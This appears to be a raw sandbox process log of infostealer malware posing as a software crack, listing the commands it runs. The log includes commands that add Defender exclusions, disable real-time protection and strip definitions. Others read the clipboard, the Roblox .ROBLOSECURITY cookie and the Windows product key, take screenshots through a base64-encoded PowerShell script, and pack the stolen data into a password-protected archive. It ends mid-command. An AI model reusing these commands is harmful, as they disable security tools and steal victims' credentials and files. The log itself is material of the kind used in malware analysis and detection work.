powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Users\Admin\AppData\Local\Temp\onefile_2936_133633183327163315\loader.exe
bound.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start main.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x55i3cg2\x55i3cg2.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD3F9.tmp" "c:\Users\Admin\AppData\Local\Temp\x55i3cg2\CSCA0CE13A1622A49CE93973C97997658C.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI34282\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\cgQX6.zip" *"
C:\Users\Admin\AppData\Local\Temp\_MEI34282\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI34282\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\cgQX6.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
C:\Users\Admin\AppData\Local\Temp\loader.exe
"C:\Users\Admin\AppData\Local\Temp\loader.exe"
C:\Users\Admin\AppData\Local\Temp\loader.exe
"C:\Users\Admin\AppData\Local\Temp\loader.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start bound.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\loader.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Make sure to join discord.gg/input for more | Contact robio.xyz if u have any problems ', 0, 'Crack Done <3', 48+16);close()"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Users\Admin\AppData\Local\Temp\bound.exe
bound.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
C:\Users\Admin\AppData\Local\Temp\onefile_4332_133633183657441706\loader.exe
bound.exe
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
C:\Windows\system32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "start main.exe"
C:\Users\Admin\AppData\Local\Temp\main.exe
main.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Users\Admin\AppData\Local\Temp\onefile_3364_133633183691898583\main.exe
main.exe
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4A